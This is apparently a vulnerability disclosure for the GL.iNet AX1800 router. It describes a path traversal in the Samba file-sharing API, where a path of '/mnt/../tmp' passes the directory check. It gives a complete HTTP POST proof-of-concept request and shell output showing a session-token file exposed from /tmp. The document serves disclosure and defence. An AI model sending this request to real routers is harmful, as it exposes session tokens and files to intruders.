Affected Product
glinet AX1800
Path Traversal
Through the file sharing feature, it is possible to share and arbitrary directory. It is possible to bypass the current check that verifies whether the starting directory is /mnt/ by using the ../, so by specifying /mnt/../tmp as the directory, it is still possible to share the /tmp directory.
We prepared also a video PoC:
Proof of Concept:
Request
POST /cgi-bin/api/files/samba/set HTTP/1.1Host: 192.168.8.1Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestAuthorization: 592e4f05283346008452c8c8ca8edf95User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Referer: <http://192.168.8.1/Accept-Encoding:> gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: Admin-Token=592e4f05283346008452c8c8ca8edf95Connection: closeContent-Length: 62
path=/mnt/../tmp&lan_share=true&wan_share=falase&writable=true**
**
On the shell
//192.168.8.1/GL-Samba
gl_token_592e4f05283346008452c8c8ca8edf95 N 2972 Jul 29 08:43 2023